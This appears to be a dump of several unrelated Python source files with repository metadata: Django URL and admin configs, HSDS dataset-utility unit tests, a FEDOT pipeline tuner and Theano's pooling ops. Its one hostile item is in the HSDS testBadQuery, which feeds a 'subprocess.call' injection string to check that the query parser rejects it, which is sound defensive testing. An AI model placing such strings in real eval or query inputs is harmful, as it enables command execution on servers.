Swagger(app, template_file=os.path.join(ROOT_DIR, app.config.get('SWAGGER_TEMPLATE_PATH')), parse=True)
return app
| true | true |
f7104645b4e560e005f0f55e7673f10e687b7f5e | 828 | py | Python | Sample REST API/SampleProject/urls.py | tanvipenumudy/Cookiecutter_Django_REST-API | f6604d7798ecebf0c432cdf141c24b0c2d85fdf2 | [
"MIT"
] | null | null | null | Sample REST API/SampleProject/urls.py | tanvipenumudy/Cookiecutter_Django_REST-API | f6604d7798ecebf0c432cdf141c24b0c2d85fdf2 | [
"MIT"
] | null | null | null | Sample REST API/SampleProject/urls.py | tanvipenumudy/Cookiecutter_Django_REST-API | f6604d7798ecebf0c432cdf141c24b0c2d85fdf2 | [
"MIT"
] | null | null | null | """SampleProject URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from MyApp import views
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^idealweight/',views.IdealWeight)
]
| 34.5 | 77 | 0.713768 | from django.conf.urls import url
from django.contrib import admin
from MyApp import views
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^idealweight/',views.IdealWeight)
]
| true | true |
f71046c1dc5db319fb44c820336093811da73c30 | 931 | py | Python | algorithm_web/admin/problem.py | KMU-algolab/algorithm | 2b734978da78b936244580ed1febe4f9f6cf1aea | [
"MIT"
] | null | null | null | algorithm_web/admin/problem.py | KMU-algolab/algorithm | 2b734978da78b936244580ed1febe4f9f6cf1aea | [
"MIT"
] | 10 | 2019-03-15T05:12:23.000Z | 2020-05-06T13:05:49.000Z | algorithm_web/admin/problem.py | KMU-algolab/algorithm | 2b734978da78b936244580ed1febe4f9f6cf1aea | [
"MIT"
] | null | null | null | from django.contrib import admin
from .. import models
@admin.register(models.Problem)
class ProblemeAdmin(admin.ModelAdmin):
"""
문제관리
"""
list_display = ['problem_name', 'limit_time', 'limit_memory', 'scoring_type', 'level', 'info', 'is_open', 'checker_code']
class Meta:
model = models.Problem
@admin.register(models.ProblemSet)
class ProblemSetAdmin(admin.ModelAdmin):
"""
문제집관리
"""
list_display = ['set_name', 'editor', 'message']
class Meta:
model = models.ProblemSet
@admin.register(models.ProblemList)
class ProblemListAdmin(admin.ModelAdmin):
"""
문제집 문제관리
"""
list_display = ['problem_set', 'problem']
class Meta:
model = models.ProblemList
@admin.register(models.TestCase)
class TestCaseAdmin(admin.ModelAdmin):
"""
테스트케이스관리
"""
list_display = ['id', 'problem']
class Meta:
model = models.TestCase | 19.808511 | 125 | 0.647691 | from django.contrib import admin
from .. import models
@admin.register(models.Problem)
class ProblemeAdmin(admin.ModelAdmin):
list_display = ['problem_name', 'limit_time', 'limit_memory', 'scoring_type', 'level', 'info', 'is_open', 'checker_code']
class Meta:
model = models.Problem
@admin.register(models.ProblemSet)
class ProblemSetAdmin(admin.ModelAdmin):
list_display = ['set_name', 'editor', 'message']
class Meta:
model = models.ProblemSet
@admin.register(models.ProblemList)
class ProblemListAdmin(admin.ModelAdmin):
list_display = ['problem_set', 'problem']
class Meta:
model = models.ProblemList
@admin.register(models.TestCase)
class TestCaseAdmin(admin.ModelAdmin):
list_display = ['id', 'problem']
class Meta:
model = models.TestCase | true | true |
f710474b36d3e20f8e9a1f23e934f85fb7128046 | 6,277 | py | Python | tests/unit/dsetUtilTest.py | murlock/hsds | 9f5fc3cdb64017d07e34eb422eee5398553d213c | [
"Apache-2.0"
] | null | null | null | tests/unit/dsetUtilTest.py | murlock/hsds | 9f5fc3cdb64017d07e34eb422eee5398553d213c | [
"Apache-2.0"
] | null | null | null | tests/unit/dsetUtilTest.py | murlock/hsds | 9f5fc3cdb64017d07e34eb422eee5398553d213c | [
"Apache-2.0"
] | null | null | null | ##############################################################################
# Copyright by The HDF Group. #
# All rights reserved. #
# #
# This file is part of HSDS (HDF5 Scalable Data Service), Libraries and #
# Utilities. The full HSDS copyright notice, including #
# terms governing use, modification, and redistribution, is contained in #
# the file COPYING, which can be found at the root of the source code #
# distribution tree. If you do not have access to this file, you may #
# request a copy from help@hdfgroup.org. #
##############################################################################
import unittest
import sys
sys.path.append('../../hsds/util')
sys.path.append('../../hsds')
from dsetUtil import getHyperslabSelection, getSelectionShape
from dsetUtil import ItemIterator, getEvalStr
class DsetUtilTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(DsetUtilTest, self).__init__(*args, **kwargs)
# main
def testGetHyperslabSelection(self):
# getHyperslabSelection(dsetshape, start, stop, step)
# 1-D case
datashape = [100,]
slices = getHyperslabSelection(datashape)
self.assertEqual(len(slices), 1)
self.assertEqual(slices[0], slice(0, 100, 1))
slices = getHyperslabSelection(datashape, 20)
self.assertEqual(len(slices), 1)
self.assertEqual(slices[0], slice(20, 100, 1))
slices = getHyperslabSelection(datashape, 20, 80)
self.assertEqual(len(slices), 1)
self.assertEqual(slices[0], slice(20, 80, 1))
slices = getHyperslabSelection(datashape, 20, 80, 2)
self.assertEqual(len(slices), 1)
self.assertEqual(slices[0], slice(20, 80, 2))
datashape = [100, 50]
slices = getHyperslabSelection(datashape)
self.assertEqual(len(slices), 2)
self.assertEqual(slices[0], slice(0, 100, 1))
self.assertEqual(slices[1], slice(0, 50, 1))
slices = getHyperslabSelection(datashape, (10, 20))
self.assertEqual(len(slices), 2)
self.assertEqual(slices[0], slice(10, 100, 1))
self.assertEqual(slices[1], slice(20, 50, 1))
slices = getHyperslabSelection(datashape, (10, 20), (90, 30))
self.assertEqual(len(slices), 2)
self.assertEqual(slices[0], slice(10, 90, 1))
self.assertEqual(slices[1], slice(20, 30, 1))
slices = getHyperslabSelection(datashape, (10, 20), (90, 30), (1,2))
self.assertEqual(len(slices), 2)
self.assertEqual(slices[0], slice(10, 90, 1))
self.assertEqual(slices[1], slice(20, 30, 2))
def testGetSelectionShape(self):
sel = [ slice(3,7,1), ]
shape = getSelectionShape(sel)
self.assertEqual(shape, [4,])
sel = [ slice(3,7,3), ] # select points 3, 6
shape = getSelectionShape(sel)
self.assertEqual(shape, [2,])
sel = [ slice(44,52,1), slice(48,52,1) ]
shape = getSelectionShape(sel)
self.assertEqual(shape, [8,4])
sel = [ slice(0, 4, 2), ] # select points 0, 2
shape = getSelectionShape(sel)
self.assertEqual(shape, [2,])
sel = [ slice(0, 5, 2), ] # select points 0, 2, 4
shape = getSelectionShape(sel)
self.assertEqual(shape, [3,])
def testGetEvalStr(self):
queries = { "date == 23": "rows['date'] == 23",
"wind == b'W 5'": "rows['wind'] == b'W 5'",
"temp > 61": "rows['temp'] > 61",
"(date >=22) & (date <= 24)": "(rows['date'] >=22) & (rows['date'] <= 24)",
"(date == 21) & (temp > 70)": "(rows['date'] == 21) & (rows['temp'] > 70)",
"(wind == b'E 7') | (wind == b'S 7')": "(rows['wind'] == b'E 7') | (rows['wind'] == b'S 7')" }
fields = ["date", "wind", "temp"]
for query in queries.keys():
eval_str = getEvalStr(query, "rows", fields)
self.assertEqual(eval_str, queries[query])
#print(query, "->", eval_str)
def testBadQuery(self):
queries = ( "foobar", # no variable used
"wind = b'abc", # non-closed literal
"(wind = b'N') & (temp = 32", # missing paren
"foobar > 42", # invalid field name
"import subprocess; subprocess.call(['ls', '/'])") # injection attack
fields = ("date", "wind", "temp" )
for query in queries:
try:
eval_str = getEvalStr(query, "x", fields)
self.assertTrue(False) # shouldn't get here
except Exception:
pass # ok
def testItemIterator(self):
# 1-D case
datashape = [10,]
slices = getHyperslabSelection(datashape)
it = ItemIterator(slices)
indices = []
count = 0
while True:
try:
index = it.next()
count += 1
indices.append(index)
except StopIteration:
break
self.assertEqual(count, 10)
self.assertEqual(indices, list(range(10)))
# 2-D case
datashape = [4, 5]
slices = getHyperslabSelection(datashape)
it = ItemIterator(slices)
indices = []
count = 0
while True:
try:
index = it.next()
self.assertTrue(len(index), 2)
self.assertTrue(index[0] >= 0)
self.assertTrue(index[0] < 4)
self.assertTrue(index[1] >= 0)
self.assertTrue(index[1] < 5)
count += 1
indices.append(index)
except StopIteration:
break
self.assertEqual(count, 20)
if __name__ == '__main__':
#setup test files
unittest.main()
| 38.27439 | 114 | 0.498487 | true | true | |
f71048378dda0fc6890665ea8932c66d76ee0535 | 6,037 | py | Python | fedot/core/pipelines/tuning/unified.py | bahia14/Fedot_Times_Series_Forecast | 995751068733541ba2f546065082709ce0fb63ae | [
"BSD-3-Clause"
] | null | null | null | fedot/core/pipelines/tuning/unified.py | bahia14/Fedot_Times_Series_Forecast | 995751068733541ba2f546065082709ce0fb63ae | [
"BSD-3-Clause"
] | null | null | null | fedot/core/pipelines/tuning/unified.py | bahia14/Fedot_Times_Series_Forecast | 995751068733541ba2f546065082709ce0fb63ae | [
"BSD-3-Clause"
] | null | null | null | from datetime import timedelta
from functools import partial
import numpy as np
from hyperopt import fmin, space_eval, tpe
from fedot.core.data.data_split import train_test_data_setup
from fedot.core.log import Log
from fedot.core.pipelines.tuning.hyperparams import convert_params, get_node_params
from fedot.core.pipelines.tuning.tuner_interface import HyperoptTuner, _greater_is_better
MAX_METRIC_VALUE = 10e6
class PipelineTuner(HyperoptTuner):
"""
Class for hyperparameters optimization for all nodes simultaneously
"""
def __init__(self, pipeline, task, iterations=100,
timeout: timedelta = timedelta(minutes=5),
log: Log = None):
super().__init__(pipeline, task, iterations, timeout, log)
def tune_pipeline(self, input_data, loss_function, loss_params=None):
""" Function for hyperparameters tuning on the entire pipeline """
parameters_dict = self._get_parameters_for_tune(self.pipeline)
# Train test split
train_input, predict_input = train_test_data_setup(input_data)
test_target = np.array(predict_input.target)
is_need_to_maximize = _greater_is_better(target=test_target,
loss_function=loss_function,
loss_params=loss_params)
self.is_need_to_maximize = is_need_to_maximize
# Check source metrics for data
self.init_check(train_input, predict_input, test_target,
loss_function, loss_params)
best = fmin(partial(self._objective,
pipeline=self.pipeline,
train_input=train_input,
predict_input=predict_input,
test_target=test_target,
loss_function=loss_function,
loss_params=loss_params),
parameters_dict,
algo=tpe.suggest,
max_evals=self.iterations,
timeout=self.max_seconds)
best = space_eval(space=parameters_dict, hp_assignment=best)
tuned_pipeline = self.set_arg_pipeline(pipeline=self.pipeline,
parameters=best)
# Validation is the optimization do well
final_pipeline = self.final_check(train_input=train_input,
predict_input=predict_input,
test_target=test_target,
tuned_pipeline=tuned_pipeline,
loss_function=loss_function,
loss_params=loss_params)
return final_pipeline
@staticmethod
def set_arg_pipeline(pipeline, parameters):
""" Method for parameters setting to a pipeline
:param pipeline: pipeline to which parameters should ba assigned
:param parameters: dictionary with parameters to set
:return pipeline: pipeline with new hyperparameters in each node
"""
# Set hyperparameters for every node
for node_id, _ in enumerate(pipeline.nodes):
node_params = parameters.get(node_id)
if node_params is not None:
# Delete all prefix strings to get appropriate parameters names
new_params = convert_params(node_params)
# Update parameters in nodes
pipeline.nodes[node_id].custom_params = new_params
return pipeline
@staticmethod
def _get_parameters_for_tune(pipeline):
"""
Function for defining the search space
:param pipeline: pipeline to optimize
:return parameters_dict: dictionary with operation names and parameters
"""
parameters_dict = {}
for node_id, node in enumerate(pipeline.nodes):
operation_name = str(node.operation)
# Assign unique prefix for each model hyperparameter
# label - number of node in the pipeline
node_params = get_node_params(node_id=node_id,
operation_name=operation_name)
parameters_dict.update({node_id: node_params})
return parameters_dict
def _objective(self, parameters_dict, pipeline, train_input, predict_input,
test_target, loss_function, loss_params: dict):
"""
Objective function for minimization / maximization problem
:param parameters_dict: dictionary with operation names and parameters
:param pipeline: pipeline to optimize
:param train_input: input for train pipeline model
:param predict_input: input for test pipeline model
:param test_target: target for validation
:param loss_function: loss function to optimize
:param loss_params: parameters for loss function
:return metric_value: value of objective function
"""
# Set hyperparameters for every node
pipeline = PipelineTuner.set_arg_pipeline(pipeline=pipeline, parameters=parameters_dict)
try:
metric_value = PipelineTuner.get_metric_value(train_input=train_input,
predict_input=predict_input,
test_target=test_target,
pipeline=pipeline,
loss_function=loss_function,
loss_params=loss_params)
except Exception:
if self.is_need_to_maximize is True:
metric_value = -MAX_METRIC_VALUE
else:
metric_value = MAX_METRIC_VALUE
if self.is_need_to_maximize is True:
return -metric_value
else:
return metric_value
| 40.246667 | 96 | 0.597813 | from datetime import timedelta
from functools import partial
import numpy as np
from hyperopt import fmin, space_eval, tpe
from fedot.core.data.data_split import train_test_data_setup
from fedot.core.log import Log
from fedot.core.pipelines.tuning.hyperparams import convert_params, get_node_params
from fedot.core.pipelines.tuning.tuner_interface import HyperoptTuner, _greater_is_better
MAX_METRIC_VALUE = 10e6
class PipelineTuner(HyperoptTuner):
def __init__(self, pipeline, task, iterations=100,
timeout: timedelta = timedelta(minutes=5),
log: Log = None):
super().__init__(pipeline, task, iterations, timeout, log)
def tune_pipeline(self, input_data, loss_function, loss_params=None):
parameters_dict = self._get_parameters_for_tune(self.pipeline)
train_input, predict_input = train_test_data_setup(input_data)
test_target = np.array(predict_input.target)
is_need_to_maximize = _greater_is_better(target=test_target,
loss_function=loss_function,
loss_params=loss_params)
self.is_need_to_maximize = is_need_to_maximize
self.init_check(train_input, predict_input, test_target,
loss_function, loss_params)
best = fmin(partial(self._objective,
pipeline=self.pipeline,
train_input=train_input,
predict_input=predict_input,
test_target=test_target,
loss_function=loss_function,
loss_params=loss_params),
parameters_dict,
algo=tpe.suggest,
max_evals=self.iterations,
timeout=self.max_seconds)
best = space_eval(space=parameters_dict, hp_assignment=best)
tuned_pipeline = self.set_arg_pipeline(pipeline=self.pipeline,
parameters=best)
final_pipeline = self.final_check(train_input=train_input,
predict_input=predict_input,
test_target=test_target,
tuned_pipeline=tuned_pipeline,
loss_function=loss_function,
loss_params=loss_params)
return final_pipeline
@staticmethod
def set_arg_pipeline(pipeline, parameters):
for node_id, _ in enumerate(pipeline.nodes):
node_params = parameters.get(node_id)
if node_params is not None:
new_params = convert_params(node_params)
pipeline.nodes[node_id].custom_params = new_params
return pipeline
@staticmethod
def _get_parameters_for_tune(pipeline):
parameters_dict = {}
for node_id, node in enumerate(pipeline.nodes):
operation_name = str(node.operation)
node_params = get_node_params(node_id=node_id,
operation_name=operation_name)
parameters_dict.update({node_id: node_params})
return parameters_dict
def _objective(self, parameters_dict, pipeline, train_input, predict_input,
test_target, loss_function, loss_params: dict):
pipeline = PipelineTuner.set_arg_pipeline(pipeline=pipeline, parameters=parameters_dict)
try:
metric_value = PipelineTuner.get_metric_value(train_input=train_input,
predict_input=predict_input,
test_target=test_target,
pipeline=pipeline,
loss_function=loss_function,
loss_params=loss_params)
except Exception:
if self.is_need_to_maximize is True:
metric_value = -MAX_METRIC_VALUE
else:
metric_value = MAX_METRIC_VALUE
if self.is_need_to_maximize is True:
return -metric_value
else:
return metric_value
| true | true |
f71048c31984514aba32b993f0eaae5c4531e8fa | 97,683 | py | Python | theano/tensor/signal/pool.py | zploskey/Theano | 9b3f6351d41d9f5e01b198e3de7538d7f032c409 | [
"BSD-3-Clause"
] | 1 | 2017-06-30T21:37:52.000Z | 2017-06-30T21:37:52.000Z | theano/tensor/signal/pool.py | zploskey/Theano | 9b3f6351d41d9f5e01b198e3de7538d7f032c409 | [
"BSD-3-Clause"
] | null | null | null | theano/tensor/signal/pool.py | zploskey/Theano | 9b3f6351d41d9f5e01b198e3de7538d7f032c409 | [
"BSD-3-Clause"
] | 1 | 2020-01-06T20:28:42.000Z | 2020-01-06T20:28:42.000Z |
"""
Ops for downsampling images.
Planned:
Pool, DownsampleAvg, DownsampleSoftmax.
"""
from __future__ import absolute_import, print_function, division
# This file should move along with conv.py
import warnings
import itertools
import numpy as np
from six.moves import xrange
import six.moves.builtins as builtins
import theano
from theano import gof, OpenMPOp, tensor, Variable, Apply
from theano.gof import ParamsType, EnumList
from theano.gradient import DisconnectedType
from theano.scalar import bool as bool_t
def max_pool_2d_same_size(input, patch_size):
"""
Takes as input a 4-D tensor. It sets all non maximum values
of non-overlapping patches of size (patch_size[0],patch_size[1]) to zero,
keeping only the maximum values. The output has the same dimensions as
the input.
Parameters
----------
input : 4-D theano tensor of input images
Input images. Max pooling will be done over the 2 last dimensions.
patch_size : tuple of length 2 or theano vector of ints of size 2.
Size of the patch (patch height, patch width).
(2,2) will retain only one non-zero value per patch of 4 values.
"""
output = Pool(True)(input, patch_size)
outs = MaxPoolGrad(True)(input, output, output, patch_size)
return outs
def pool_2d(input, ws=None, ignore_border=None, stride=None, pad=(0, 0),
mode='max', ds=None, st=None, padding=None):
"""Downscale the input by a specified factor
Takes as input a N-D tensor, where N >= 2. It downscales the input image by
the specified factor, by keeping only the maximum value of non-overlapping
patches of size (ws[0],ws[1])
Parameters
----------
input : N-D theano tensor of input images
Input images. Max pooling will be done over the 2 last dimensions.
ws : tuple of length 2 or theano vector of ints of size 2.
Factor by which to downscale (vertical ws, horizontal ws).
(2,2) will halve the image in each dimension.
ignore_border : bool (default None, will print a warning and set to False)
When True, (5,5) input with ws=(2,2) will generate a (2,2) output.
(3,3) otherwise.
stride : tuple of two ints or theano vector of ints of size 2.
Stride size, which is the number of shifts over rows/cols to get the
next pool region. If stride is None, it is considered equal to ws
(no overlap on pooling regions), eg: stride=(1,1) will shifts over
one row and one col for every iteration.
pad : tuple of two ints or theano vector of ints of size 2.
(pad_h, pad_w), pad zeros to extend beyond four borders of the
images, pad_h is the size of the top and bottom margins, and
pad_w is the size of the left and right margins.
mode : {'max', 'sum', 'average_inc_pad', 'average_exc_pad'}
Operation executed on each window. `max` and `sum` always exclude
the padding in the computation. `average` gives you the choice to
include or exclude it.
ds
*deprecated*, use parameter ws instead.
st
*deprecated*, use parameter stride instead.
padding
*deprecated*, use parameter pad instead.
"""
# check for deprecated parameter names
if ds is not None:
if ws is not None:
raise ValueError(
"You can't provide a tuple value to both 'ws' and 'ds'."
" Please provide a value only to 'ws'."
)
else:
warnings.warn(
"DEPRECATION: the 'ds' parameter is not going to exist"
" anymore as it is going to be replaced by the parameter"
" 'ws'.",
stacklevel=2
)
ws = ds
elif ds is None and ws is None:
raise ValueError(
"You must provide a tuple value for the window size."
)
if st is not None:
if stride is not None:
raise ValueError(
"You can't provide a tuple value to both 'st and 'stride'."
" Please provide a value only to 'stride'."
)
else:
warnings.warn(
"DEPRECATION: the 'st' parameter is not going to exist"
" anymore as it is going to be replaced by the parameter"
" 'stride'.",
stacklevel=2
)
stride = st
if padding is not None:
if pad not in {None, (0, 0)}:
raise ValueError(
"You can't provide a tuple value to both 'padding' and pad."
" Please provide a value only to pad."
)
else:
warnings.warn(
"DEPRECATION: the 'padding' parameter is not going to exist"
" anymore as it is going to be replaced by the parameter"
" 'pad'.",
stacklevel=2
)
pad = padding
if input.ndim < 2:
raise NotImplementedError('pool_2d requires a dimension >= 2')
if ignore_border is None:
warnings.warn(
"pool_2d() will have the parameter ignore_border"
" default value changed to True (currently"
" False). To have consistent behavior with all Theano"
" version, explicitly add the parameter ignore_border=True."
" On the GPU, using ignore_border=True is needed to use cuDNN."
" When using ignore_border=False and not using cuDNN, the only"
" GPU combination supported is when"
" `ws == stride and pad == (0, 0) and mode == 'max'`."
" Otherwise, the convolution will be executed on CPU.",
stacklevel=2)
ignore_border = False
op = Pool(ignore_border, ndim=2, mode=mode)
output = op(input, ws, stride, pad)
return output
def pool_3d(input, ws=None, ignore_border=None, stride=None, pad=(0, 0, 0),
mode='max', ds=None, st=None, padding=None):
"""Downscale the input by a specified factor
Takes as input a N-D tensor, where N >= 3. It downscales the input image by
the specified factor, by keeping only the maximum value of non-overlapping
patches of size (ws[0],ws[1],ws[2])
Parameters
----------
input : N-D theano tensor of input images
Input images. Max pooling will be done over the 3 last dimensions.
ws : tuple of length 3 or theano vector of ints of size 3
Factor by which to downscale (vertical ws, horizontal ws, depth ws).
(2,2,2) will halve the image in each dimension.
ignore_border : bool (default None, will print a warning and set to False)
When True, (5,5,5) input with ws=(2,2,2) will generate a (2,2,2) output.
(3,3,3) otherwise.
st : tuple of three ints or theano vector of ints of size 3
Stride size, which is the number of shifts over rows/cols/slices to get
the next pool region. If st is None, it is considered equal to ws
(no overlap on pooling regions).
pad : tuple of two ints or theano vector of ints of size 3
(pad_h, pad_w, pad_d), pad zeros to extend beyond six borders of the
images, pad_h is the size of the top and bottom margins,
pad_w is the size of the left and right margins, and pad_d is the size
of the front and back margins
mode : {'max', 'sum', 'average_inc_pad', 'average_exc_pad'}
Operation executed on each window. `max` and `sum` always exclude
the padding in the computation. `average` gives you the choice to
include or exclude it.
ds
*deprecated*, use parameter ws instead.
st
*deprecated*, use parameter st instead.
padding
*deprecated*, use parameter pad instead.
"""
# check for deprecated parameter names
if ds is not None:
if ws is not None:
raise ValueError(
"You can't provide a tuple value to both 'ws' and 'ds'."
" Please provide a value only to 'ws'."
)
else:
warnings.warn(
"DEPRECATION: the 'ds' parameter is not going to exist"
" anymore as it is going to be replaced by the parameter"
" 'ws'.",
stacklevel=2
)
ws = ds
elif ds is None and ws is None:
raise ValueError(
"You must provide a tuple value for the window size."
)
if st is not None:
if stride is not None:
raise ValueError(
"You can't provide a tuple value to both 'st and 'stride'."
" Please provide a value only to 'stride'."
)
else:
warnings.warn(
"DEPRECATION: the 'st' parameter is not going to exist"
" anymore as it is going to be replaced by the parameter"
" 'stride'.",
stacklevel=2
)
stride = st
if padding is not None:
if pad not in {None, (0, 0, 0)}:
raise ValueError(
"You can't provide a tuple value to both 'padding' and pad."
" Please provide a value only to pad."
)
else:
warnings.warn(
"DEPRECATION: the 'padding' parameter is not going to exist"
" anymore as it is going to be replaced by the parameter"
" 'pad'.",
stacklevel=2
)
pad = padding
if input.ndim < 3:
raise NotImplementedError('pool_3d requires a dimension >= 3')
if ignore_border is None:
warnings.warn(
"pool_3d() will have the parameter ignore_border"
" default value changed to True (currently"
" False). To have consistent behavior with all Theano"
" version, explicitly add the parameter ignore_border=True."
" On the GPU, using ignore_border=True is needed to use cuDNN."
" When using ignore_border=False and not using cuDNN, the only"
" GPU combination supported is when"
" `ws == stride and pad == (0, 0, 0) and mode == 'max'`."
" Otherwise, the convolution will be executed on CPU.",
stacklevel=2)
ignore_border = False
op = Pool(ignore_border, ndim=3, mode=mode)
output = op(input, ws, stride, pad)
return output
# NB: This enum type is currently used in gpuarray/pool.py.
# It may be used later as op param in this current file.
# Enum name and constants names are inspired from cuDNN type `cudnnPoolingMode_t`
# (cf. `theano/gpuarray/cudnn_defs.py`).
PoolingMode_t = EnumList(('POOLING_MAX', 'max'),
('POOLING_SUM', 'sum'),
('POOLING_AVERAGE_COUNT_INCLUDE_PADDING', 'average_inc_pad'),
('POOLING_AVERAGE_COUNT_EXCLUDE_PADDING', 'average_exc_pad'))
class Pool(OpenMPOp):
"""
sum or average over different patches.
Parameters
----------
ws : list or tuple of N ints
Downsample factor over rows, columns etc.
ws indicates the size of the pooling region.
ignore_border : bool
If ws doesn't divide imgshape, do we include an extra row/col/slice
of partial downsampling (False) or ignore it (True).
stride : list or tuple of N ints or None
Stride size, which is the number of shifts over rows/cols/slices to get the
next pool region. If stride is None, it is considered equal to ws
(no overlap on pooling regions).
pad : tuple of N ints or None
For each downsampling dimension, this specifies the number of zeros to
add as padding on both sides. For 2D and (pad_h, pad_w), pad_h specifies the
size of the top and bottom margins, pad_w specifies the size of the left and
right margins. No padding is added if pad is None.
mode : {'max', 'sum', 'average_inc_pad', 'average_exc_pad'}
('average_inc_pad' excludes the padding from the count,
'average_exc_pad' include it)
ndim : int
The number of pooling dimensions N.
The default is 2.
ds
*deprecated*, use parameter ws instead.
st
*deprecated*, use parameter st instead.
padding
*deprecated*, use parameter pad instead.
"""
__props__ = ('ignore_border', 'mode', 'ndim')
params_type = ParamsType(ignore_border=bool_t,)
@staticmethod
def out_shape(imgshape, ws=None, ignore_border=False, stride=None, pad=None,
ndim=2, ds=None, st=None, padding=None):
"""
Return the shape of the output from this op, for input of given
shape and flags.
Parameters
----------
imgshape : tuple, list, or similar of integer or scalar Theano variable
The shape of a tensor of images. The last N elements are
interpreted as the number of rows, and the number of cols.
ws : list or tuple of N ints
Downsample factor over rows and column.
ws indicates the pool region size.
ignore_border : bool
If ws doesn't divide imgshape, do we include an extra row/col/slice
of partial downsampling (False) or ignore it (True).
stride : list or tuple of N ints or None
Stride size, which is the number of shifts over rows/cols/slices to get the
next pool region. If stride is None, it is considered equal to ws
(no overlap on pooling regions).
pad : tuple of N ints or None
For each downsampling dimension, this specifies the number of zeros to
add as padding on both sides. For 2D and (pad_h, pad_w), pad_h specifies the
size of the top and bottom margins, pad_w specifies the size of the left and
right margins. No padding is added if pad is None.
ndim : int
The number of pooling dimensions N.
The default is 2.
ds
*deprecated*, use parameter ws instead.
st
*deprecated*, use parameter st instead.
padding
*deprecated*, use parameter pad instead.
Returns
-------
list
The shape of the output from this op, for input of given shape.
This will have the same length as imgshape, but with last N
elements reduced as per the downsampling & ignore_border flags.
"""
# check for deprecated parameter names
if ds is not None:
if ws is not None:
raise ValueError(
"You can't provide a tuple value to both 'ws' and 'ds'."
" Please provide a value only to 'ws'."
)
else:
warnings.warn(
"DEPRECATION: the 'ds' parameter is not going to exist"
" anymore as it is going to be replaced by the parameter"
" 'ws'.",
stacklevel=2
)
ws = ds
elif ds is None and ws is None:
raise ValueError(
"You must provide a tuple value for the window size."
)
if st is not None:
if stride is not None:
raise ValueError(
"You can't provide a tuple value to both 'st and 'stride'."
" Please provide a value only to 'stride'."
)
else:
warnings.warn(
"DEPRECATION: the 'st' parameter is not going to exist"
" anymore as it is going to be replaced by the parameter"
" 'stride'.",
stacklevel=2
)
stride = st
if padding is not None:
zero_pad = (0,) * ndim
if pad not in {None, zero_pad}:
raise ValueError(
"You can't provide a tuple value to both 'padding' and pad."
" Please provide a value only to pad."
)
else:
warnings.warn(
"DEPRECATION: the 'padding' parameter is not going to"
" exist anymore as it is going to be replaced by the"
" parameter 'pad'.",
stacklevel=2
)
pad = padding
if ndim is None:
ndim = 2
assert ndim > 0
if len(imgshape) < ndim:
raise TypeError('imgshape must have at least {} dimensions'.format(ndim))
if stride is None:
stride = ws
if pad is None:
pad = (0,) * ndim
patch_shape = tuple(tensor.extract_constant(imgshape[-ndim + i]) + pad[i] * 2
for i in xrange(ndim))
def compute_out(v, downsample, stride):
if ignore_border:
if downsample == stride:
return v // stride
else:
out = (v - downsample) // stride + 1
if isinstance(out, theano.Variable):
return tensor.maximum(out, 0)
else:
return np.maximum(out, 0)
else:
if isinstance(v, theano.Variable):
return tensor.switch(tensor.ge(stride, downsample),
(v - 1) // stride + 1,
tensor.maximum(0, (v - 1 - downsample) //
stride + 1) + 1)
elif stride >= downsample:
return (v - 1) // stride + 1
else:
return max(0, (v - 1 - downsample + stride) // stride) + 1
out_shape = [compute_out(patch_shape[i], ws[i], stride[i]) for i in xrange(ndim)]
rval = list(imgshape[:-ndim]) + out_shape
return rval
def __init__(self, ignore_border=False, mode='max', ndim=2, openmp=None):
super(Pool, self).__init__(openmp=openmp)
self.ndim = ndim
self.ignore_border = ignore_border
if mode == 'max_deterministic':
# It seems max pool algo is already deterministic in CPU.
mode = 'max'
if mode not in ['max', 'average_inc_pad', 'average_exc_pad', 'sum']:
raise ValueError(
"Pool mode parameter only support 'max', 'sum',"
" 'average_inc_pad' and 'average_exc_pad'. Got %s" % mode)
self.mode = mode
def prepare_node(self, node, storage_map, compute_map, impl):
if len(node.inputs) == 1:
# Old interface
self.ndim = len(node.op.ds)
self.mode = node.op.mode
ws = theano.tensor.constant(node.op.ds)
st = theano.tensor.constant(node.op.st)
pad = theano.tensor.constant(node.op.padding)
node.inputs.append(ws)
node.inputs.append(st)
node.inputs.append(pad)
if isinstance(ws, theano.Constant):
storage_map[ws] = [ws.data]
compute_map[ws] = [True]
else:
storage_map[ws] = [None]
compute_map[ws] = [False]
if isinstance(st, theano.Constant):
storage_map[st] = [st.data]
compute_map[st] = [True]
else:
storage_map[st] = [None]
compute_map[st] = [False]
if isinstance(pad, theano.Constant):
storage_map[pad] = [pad.data]
compute_map[pad] = [True]
else:
storage_map[pad] = [None]
compute_map[pad] = [False]
def make_node(self, x, ws, stride=None, pad=None):
# TODO: consider restricting the dtype?
x = tensor.as_tensor_variable(x)
nd = self.ndim
if stride is None:
stride = ws
if pad is None:
pad = (0,) * nd
elif isinstance(pad, (tuple, list)):
if max(pad) != 0 and not self.ignore_border:
raise NotImplementedError(
'padding works only with ignore_border=True')
if isinstance(ws, (tuple, list)):
if any(pad[i] >= ws[i] for i in range(nd)):
raise NotImplementedError(
'padding must be smaller than strides')
ws = tensor.as_tensor_variable(ws)
stride = tensor.as_tensor_variable(stride)
pad = tensor.as_tensor_variable(pad)
assert ws.ndim == 1
assert stride.ndim == 1
assert pad.ndim == 1
if x.type.ndim < nd:
raise TypeError()
if ws.dtype not in tensor.int_dtypes:
raise TypeError('Pool downsample parameters must be ints.')
if stride.dtype not in tensor.int_dtypes:
raise TypeError('Stride parameters must be ints.')
if pad.dtype not in tensor.int_dtypes:
raise TypeError('Padding parameters must be ints.')
# If the input shape are broadcastable we can have 0 in the output shape
broad = x.broadcastable[:-nd] + (False,) * nd
out = tensor.TensorType(x.dtype, broad)
return gof.Apply(self, [x, ws, stride, pad], [out()])
def perform(self, node, inp, out, params):
x, ws, stride, pad = inp
z, = out
nd = self.ndim
assert ws.shape == stride.shape == pad.shape == (nd,)
if len(x.shape) < nd:
raise NotImplementedError(
'Pool requires input with {} or more dimensions'.format(nd))
z_shape = self.out_shape(x.shape, ws, params.ignore_border, stride, pad, nd)
if not params.ignore_border:
